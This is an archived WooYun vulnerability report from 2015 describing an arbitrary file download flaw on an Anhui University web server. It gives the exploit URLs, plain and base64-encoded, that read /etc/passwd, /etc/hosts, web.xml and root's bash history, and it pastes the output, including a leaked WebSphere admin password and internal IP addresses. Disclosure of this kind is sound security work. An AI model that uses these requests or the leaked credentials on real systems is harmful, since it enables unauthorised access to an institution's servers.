当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0130893

漏洞标题:安徽大学主站任意文件下载

相关厂商:CCERT教育网应急响应组

漏洞作者: xiaohe

提交时间:2015-08-04 13:05

修复时间:2015-09-21 09:30

公开时间:2015-09-21 09:30

漏洞类型:文件包含

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-04: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-17: 细节向核心白帽子及相关领域专家公开
2015-08-27: 细节向普通白帽子公开
2015-09-06: 细节向实习白帽子公开
2015-09-21: 细节向公众公开

简要描述:

RT

详细说明:

文件名base64编码后可任意下载,为了验证已下载了/root/.bash_history,/WEB-INF/web.xml,/etc/passwd,/etc/hosts

漏洞证明:

编码前
http://wyzx.ahu.edu.cn/download.jsp?file=/root/.bash_history
http://wyzx.ahu.edu.cn/download.jsp?file=/WEB-INF/web.xml
http://wyzx.ahu.edu.cn/download.jsp?file=/etc/passwd
http://wyzx.ahu.edu.cn/download.jsp?file=/etc/hosts
base64后
http://wyzx.ahu.edu.cn/download.jsp?file=L3Jvb3QvLmJhc2hfaGlzdG9yeQ==
http://wyzx.ahu.edu.cn/download.jsp?file=L1dFQi1JTkYvd2ViLnhtbA==
http://wyzx.ahu.edu.cn/download.jsp?file=L2V0Yy9wYXNzd2Q=
http://wyzx.ahu.edu.cn/download.jsp?file=L2V0Yy9ob3N0cw==
以下按照顺序贴上文件部分代码

cd ../AppServer/profiles/AppSrv01/bin/
./addNode.sh xg1 8879 -username wasadmin -password ahuadmin
hostname hq2
vi /etc/hosts
vi /etc/sysconfig/network


PS:或说从bash_history中看出用户名密码。。。,这个我就不动手深挖了,继续贴

<?xml version="1.0" encoding="UTF-8"?>
<web-app version="2.5" 
	xmlns="http://java.sun.com/xml/ns/javaee" 
	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
	xsi:schemaLocation="http://java.sun.com/xml/ns/javaee 
	http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd">
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>
</web-app>


PS:web.xml字这么少啊?。。。

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin


172.17.100.2    ky1
172.17.100.9    ky2
172.17.100.10   hq1
172.17.100.11   hq2
172.17.100.7    lx
172.17.100.250  lx2
172.17.100.3    xg1
172.17.100.4    xg2
127.0.0.1	localhost.localdomain	localhost

修复方案:

过滤,限制下载权限吧

版权声明:转载请注明来源 xiaohe@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-08-07 09:30

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给赛尔教育,由其后续协调网站管理单位处置。

最新状态:

暂无